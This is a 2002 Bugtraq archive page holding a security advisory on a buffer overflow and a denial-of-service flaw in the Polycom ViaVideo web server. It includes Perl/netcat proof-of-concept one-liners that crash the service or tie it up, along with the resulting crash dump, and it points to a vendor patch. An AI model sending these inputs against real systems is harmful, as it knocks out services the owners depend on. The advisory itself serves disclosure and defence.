Bugtraq: Security vulnerabilities in Polycom ViaVideo Web component

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Bugtraq mailing list archives

Security vulnerabilities in Polycom ViaVideo Web component

From: advisory () prophecy net nz
Date: Mon, 14 Oct 2002 08:27:54 +1300 (NZDT)


advisory @ prophecy.net.nz - 06/09/02


About
-----
The Polycom Webserver is a component of 'ViaVideo' which can be found
at: http://www.polycom.com/resource_center/0,1408,493,00.html


Affected Versions
-----------------
Polycom ViaVideo 2.2
Polycom ViaVideo 3.0


Problem #1: Buffer overflow in Polycom ViaVideo Webserver Component
-------------------------------------------------------------------


Proof of Concept
----------------
perl -e 'print "GET " . "A" x 4132 . " HTTP/1.0\r\n\r\n";' | netcat 10.1.0.1 3603

Error message on host:
OS: Microsoft® Windows 2000(TM) 5.0 Service Pack 3 Build 2195
Version: Release 3.0  26Feb2002 3.0.0.144
ViaVideo.exe caused an EXCEPTION_ACCESS_VIOLATION in module vvws.dll at 001B:67302ECE, CHttpSocket::ReadHeader()+0226 
byte(s), H:\PLCMBuilds\ViaVideo\WrkSpc\VVSource\Web\WebServer\HttpSocket.cpp, line 1092+0002 byte(s)
EAX=41414141  EBX=03D491C4  ECX=03D49190  EDX=00000001  ESI=03D49190
EDI=03D4A1E8  EBP=03B6D3F4  ESP=0586FF1C  EIP=67302ECE  FLG=00010202
CS=001B   DS=0023  SS=0023  ES=0023   FS=0038  GS=0000
001B:67302ECE (0x00000000 0x00000000 0x00000000 0x00000000) vvws.dll, CHttpSocket::ReadHeader()+0226 byte(s), 
H:\PLCMBuilds\ViaVideo\WrkSpc\VVSource\Web\WebServer\HttpSocket.cpp, line 1092+0002 byte(s)



Problem #2: Denial-of-Service Vulnerability
-------------------------------------------


Proof of Concept
----------------

- Open up several (4) connections to the webserver port (3603).
- Send any incomplete HTTP request.
- Leave these connections open at this point.
- Normal requests to the webserver will now fail.
- CPU utilisation on remote host (Win2k) goes to 99% for ViaVideo.exe

[jonny () loki 15:21:57 ~]$ perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 &
[5] 2140
[jonny () loki 15:22:14 ~]$ 
[jonny () loki 15:22:14 ~]$ jobs
[1]   Running                 perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 &
[2]   Running                 perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 &
[3]   Running                 perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 &
[4]-  Running                 perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 &
[5]+  Running                 perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 &
[jonny () loki 15:22:39 ~]$ 


Solution
--------

A patch has been supplied by Polycom and can be downloaded at: http://www.polycom.com/securitycenter


Thanks
------

Raj.Subramaniam[AT]polycom.com - for working with us to resolve these 
issues.

By Date By Thread

Current thread:

Security vulnerabilities in Polycom ViaVideo Web component advisory (Oct 14)